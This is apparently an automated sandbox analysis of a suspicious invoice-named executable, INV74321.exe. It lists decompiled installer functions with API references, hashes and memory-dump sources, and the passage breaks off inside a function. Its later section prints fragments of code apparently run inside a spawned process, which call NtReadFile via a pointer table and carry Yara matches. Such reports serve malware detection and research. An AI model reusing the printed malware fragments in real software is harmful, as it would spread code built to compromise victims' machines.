                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                          • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-3916508600
                                                          • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                          • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                          • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                          • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402E3D, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00402E3D(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x429448 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x42f430) {
							_t3 = CreateDialogParamA( *0x42f420, 0x6f, 0, E00402DBA, 0);
							 *0x429448 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E0040653C(0);
					}
				} else {
					_t6 =  *0x429448;
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x429448 = 0;
					return _t6;
				}
			}






                                                          0x00402e44
                                                          0x00402e64
                                                          0x00402e6e
                                                          0x00402e7a
                                                          0x00402e8b
                                                          0x00402e94
                                                          0x00000000
                                                          0x00402e99
                                                          0x00402ea0
                                                          0x00402e66
                                                          0x00402e6d
                                                          0x00402e6d
                                                          0x00402e46
                                                          0x00402e46
                                                          0x00402e4d
                                                          0x00402e50
                                                          0x00402e50
                                                          0x00402e56
                                                          0x00402e5d
                                                          0x00402e5d

                                                          APIs
                                                          • DestroyWindow.USER32(?,00000000,0040301B,00000001), ref: 00402E50
                                                          • GetTickCount.KERNEL32 ref: 00402E6E
                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
                                                          • API String ID: 2102729457-0
                                                          • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                          • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                          • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                          • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405B7D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E00405B7D(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E004060F7(0x42bc98, _a4);
				_t21 = E00405B28(0x42bc98);
				if(_t21 != 0) {
					E004063D2(_t21);
					if(( *0x42f43c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x42bc98;
						while(1) {
							_t11 = lstrlenA(0x42bc98);
							_push(0x42bc98);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E0040646B();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405AD6(0x42bc98);
								continue;
							} else {
								goto L1;
							}
						}
						E00405A8F();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                          0x00405b89
                                                          0x00405b94
                                                          0x00405b98
                                                          0x00405b9f
                                                          0x00405bab
                                                          0x00405bb7
                                                          0x00405bb7
                                                          0x00405bcf
                                                          0x00405bd0
                                                          0x00405bd7
                                                          0x00405bd8
                                                          0x00000000
                                                          0x00000000
                                                          0x00405bbb
                                                          0x00405bc2
                                                          0x00405bca
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405bc2
                                                          0x00405bda
                                                          0x00000000
                                                          0x00405bee
                                                          0x00405bad
                                                          0x00405bb1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405bb1
                                                          0x00405b9a
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,accumulate Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                            • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                          • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                          • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74B5FA90,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 3248276644-3916508600
                                                          • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                          • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                          • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                          • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405192, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 89%
                                                          			E00405192(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42a87c != _t16) {
							_push(_t16);
							_push(6);
							 *0x42a87c = _t16;
							E00404B4E();
						}
						L11:
						return CallWindowProcA( *0x42a884, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404ACE(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004041C7(0x413);
				return 0;
			}





                                                          0x00405196
                                                          0x004051a0
                                                          0x004051bc
                                                          0x004051de
                                                          0x004051e1
                                                          0x004051e7
                                                          0x004051f1
                                                          0x004051f2
                                                          0x004051f4
                                                          0x004051fa
                                                          0x004051fa
                                                          0x00405204
                                                          0x00000000
                                                          0x00405212
                                                          0x004051c9
                                                          0x00405201
                                                          0x00405201
                                                          0x00000000
                                                          0x00405201
                                                          0x004051d5
                                                          0x004051d7
                                                          0x00000000
                                                          0x004051d7
                                                          0x004051a6
                                                          0x00000000
                                                          0x00000000
                                                          0x004051ad
                                                          0x00000000

                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 004051C1
                                                          • CallWindowProcA.USER32 ref: 00405212
                                                            • Part of subcall function 004041C7: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004041D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                          • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                          • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                          • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405FDE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 90%
                                                          			E00405FDE(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E00405F7D(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                          0x00405fec
                                                          0x00405fee
                                                          0x00406006
                                                          0x0040600b
                                                          0x00406010
                                                          0x0040604d
                                                          0x0040604d
                                                          0x00406012
                                                          0x00406024
                                                          0x0040602f
                                                          0x00406035
                                                          0x0040603f
                                                          0x00000000
                                                          0x00000000
                                                          0x0040603f
                                                          0x00406052

                                                          APIs
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,GHFGHFGHFDGDFGDFg,0042A070,?,?,?,00000002,GHFGHFGHFDGDFGDFg,?,00406293,80000002), ref: 00406024
                                                          • RegCloseKey.ADVAPI32(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,GHFGHFGHFDGDFGDFg,GHFGHFGHFDGDFGDFg,GHFGHFGHFDGDFGDFg,?,0042A070), ref: 0040602F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID: GHFGHFGHFDGDFGDFg
                                                          • API String ID: 3356406503-2848008697
                                                          • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                          • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                                                          • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                          • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405796, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405796(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c098->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c098,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                          0x0040579f
                                                          0x004057bf
                                                          0x004057c7
                                                          0x004057cc
                                                          0x00000000
                                                          0x004057d2
                                                          0x004057d6

                                                          APIs
                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                          • CloseHandle.KERNEL32(?), ref: 004057CC
                                                          Strings
                                                          • Error launching installer, xrefs: 004057A9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                          • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                          • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                          • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00403875, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00403875() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x429854;
				_t3 = E0040385A(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x429854 =  *0x429854 & 0x00000000;
				return _t3;
			}







                                                          0x00403876
                                                          0x0040387e
                                                          0x00403885
                                                          0x00403888
                                                          0x00403888
                                                          0x0040388a
                                                          0x0040388f
                                                          0x00403896
                                                          0x0040389c
                                                          0x004038a0
                                                          0x004038a1
                                                          0x004038a9

                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,74B5FA90,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                          • GlobalFree.KERNEL32 ref: 00403896
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-3916508600
                                                          • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                          • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                          • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                          • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405AD6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405AD6(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                          0x00405ad7
                                                          0x00405ae1
                                                          0x00405ae3
                                                          0x00405aea
                                                          0x00405af2
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405af2
                                                          0x00405af4
                                                          0x00405af9

                                                          APIs
                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\INV74321.exe,C:\Users\user\Desktop\INV74321.exe,80000000,00000003), ref: 00405ADC
                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\INV74321.exe,C:\Users\user\Desktop\INV74321.exe,80000000,00000003), ref: 00405AEA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 2709904686-1669384263
                                                          • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                          • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                          • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                          • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405BF5, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405BF5(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                          0x00405c05
                                                          0x00405c07
                                                          0x00405c0a
                                                          0x00405c36
                                                          0x00405c0f
                                                          0x00405c18
                                                          0x00405c1d
                                                          0x00405c28
                                                          0x00405c2b
                                                          0x00405c47
                                                          0x00405c2d
                                                          0x00405c34
                                                          0x00000000
                                                          0x00405c34
                                                          0x00405c40
                                                          0x00405c44
                                                          0x00405c44
                                                          0x00405c3e
                                                          0x00000000

                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                          • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C1D
                                                          • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                          • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                          • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                          • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Analysis Process: INV74321.exe PID: 4604 Parent PID: 5520 INV74321.exeCOMMON

                                                          Executed Functions

                                                          Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                          0x00418273
                                                          0x0041827f
                                                          0x00418287
                                                          0x00418292
                                                          0x004182ad
                                                          0x004182b5
                                                          0x004182b9

                                                          APIs
                                                          • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: R=A$R=A
                                                          • API String ID: 2738559852-3742021989
                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041826C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35filenativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E0041826C(signed int __eax, void* __edi, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t21;
				void* _t32;
				intOrPtr* _t33;
				void* _t35;

				_t31 = __edi +  *((intOrPtr*)(__eax * 2 - 0x1374aac1));
